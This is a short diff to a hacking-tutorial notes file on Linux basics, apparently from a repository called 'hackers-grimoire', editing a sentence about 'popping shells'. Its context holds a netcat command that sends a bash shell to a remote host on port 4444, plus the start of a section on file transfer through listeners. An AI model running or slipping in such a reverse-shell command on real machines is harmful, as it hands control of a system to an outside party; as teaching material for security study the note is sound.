vulp3cula/hackers-grimoire/linux-basics.md

 ```
 nc -nv [bob] 4444 -e /bin/bash
 ```
-This is what hackers mean by popping shells, but usually it's getting a web server to send a reverse shell to your attack machine.
+This is what hackers mean by popping shells, but usually it's getting a web server/deasktop to send a reverse shell to your attack machine.

 ### Transfer files
 To transfer files, set up a listener and redirect the output to a filename: